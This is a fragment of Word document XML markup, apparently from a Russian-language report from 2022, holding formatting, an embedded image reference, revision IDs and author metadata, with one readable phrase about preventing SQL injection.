                      <a:ext cx="5940425" cy="20881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1D4813" w14:textId="77777777" w:rsidR="0086779C" w:rsidRDefault="0086779C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</w:p>
    <w:p w14:paraId="167107F4" w14:textId="16741A2F" w:rsidR="005B0C5D" w:rsidRDefault="005B0C5D" w:rsidP="005B0011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И невозможность добавления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 w:eastAsia="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B0C5D"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  <w:t>инъекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678B73EF" w14:textId="1A46269D" w:rsidR="006F506C" w:rsidRPr="0086779C" w:rsidRDefault="00E72AEC" w:rsidP="0086779C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="160" w:line="259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ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72AEC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1553171" wp14:editId="74F5D833">
            <wp:extent cx="5938642" cy="2810860"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8890"/>
            <wp:docPr id="71" name="Рисунок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24097" b="4486"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="28117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F506C" w:rsidRPr="008677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100FD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23A51C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66148688"/>
    <w:lvl w:ilvl="0" w:tplc="74E01552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2D50"/>
    <w:rsid w:val="000122DF"/>
    <w:rsid w:val="000601C7"/>
    <w:rsid w:val="00074738"/>
    <w:rsid w:val="00086488"/>
    <w:rsid w:val="000C3508"/>
    <w:rsid w:val="00116D4F"/>
    <w:rsid w:val="00137F2C"/>
    <w:rsid w:val="00162EF5"/>
    <w:rsid w:val="00211FF1"/>
    <w:rsid w:val="00220C9F"/>
    <w:rsid w:val="00267CA7"/>
    <w:rsid w:val="00291E1D"/>
    <w:rsid w:val="002A7B7E"/>
    <w:rsid w:val="002B4183"/>
    <w:rsid w:val="002F201D"/>
    <w:rsid w:val="003054D7"/>
    <w:rsid w:val="00376BC1"/>
    <w:rsid w:val="00381A1D"/>
    <w:rsid w:val="00395F67"/>
    <w:rsid w:val="003A6DC3"/>
    <w:rsid w:val="003B2205"/>
    <w:rsid w:val="003F1BDF"/>
    <w:rsid w:val="0044285C"/>
    <w:rsid w:val="00481741"/>
    <w:rsid w:val="005010A1"/>
    <w:rsid w:val="0052523F"/>
    <w:rsid w:val="00526758"/>
    <w:rsid w:val="00533B80"/>
    <w:rsid w:val="00550512"/>
    <w:rsid w:val="005B0011"/>
    <w:rsid w:val="005B0C5D"/>
    <w:rsid w:val="00632D50"/>
    <w:rsid w:val="00633E95"/>
    <w:rsid w:val="00682363"/>
    <w:rsid w:val="006F506C"/>
    <w:rsid w:val="0072256F"/>
    <w:rsid w:val="007314BC"/>
    <w:rsid w:val="00731524"/>
    <w:rsid w:val="0073545B"/>
    <w:rsid w:val="007371F1"/>
    <w:rsid w:val="007372B7"/>
    <w:rsid w:val="00756C29"/>
    <w:rsid w:val="007E72DA"/>
    <w:rsid w:val="00812031"/>
    <w:rsid w:val="00867630"/>
    <w:rsid w:val="0086779C"/>
    <w:rsid w:val="00906702"/>
    <w:rsid w:val="00954461"/>
    <w:rsid w:val="00A17965"/>
    <w:rsid w:val="00A61901"/>
    <w:rsid w:val="00A860F1"/>
    <w:rsid w:val="00AB4529"/>
    <w:rsid w:val="00B17BEA"/>
    <w:rsid w:val="00B76365"/>
    <w:rsid w:val="00B94B32"/>
    <w:rsid w:val="00BA45EB"/>
    <w:rsid w:val="00BC14D0"/>
    <w:rsid w:val="00BC25C8"/>
    <w:rsid w:val="00BC42E2"/>
    <w:rsid w:val="00BF32F3"/>
    <w:rsid w:val="00BF5CF3"/>
    <w:rsid w:val="00C03D48"/>
    <w:rsid w:val="00C14F2D"/>
    <w:rsid w:val="00C21425"/>
    <w:rsid w:val="00CF211C"/>
    <w:rsid w:val="00D34935"/>
    <w:rsid w:val="00D4391A"/>
    <w:rsid w:val="00DE6CCC"/>
    <w:rsid w:val="00E72AEC"/>
    <w:rsid w:val="00E83651"/>
    <w:rsid w:val="00EA7D15"/>
    <w:rsid w:val="00EC60B1"/>
    <w:rsid w:val="00EF71BC"/>
    <w:rsid w:val="00F279EE"/>
    <w:rsid w:val="00F27AC8"/>
    <w:rsid w:val="00F67B3E"/>
    <w:rsid w:val="00F7214A"/>
    <w:rsid w:val="00F77DA2"/>
    <w:rsid w:val="00FE0E0E"/>
    <w:rsid w:val="00FF1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4E2E9B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B276A691-4DA0-47B1-8159-6700DC772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32D50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7BEA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C25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C25C8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04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86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5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1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7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60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8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07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Клюев</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Даниил Усольцев</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-13T20:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-13T20:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>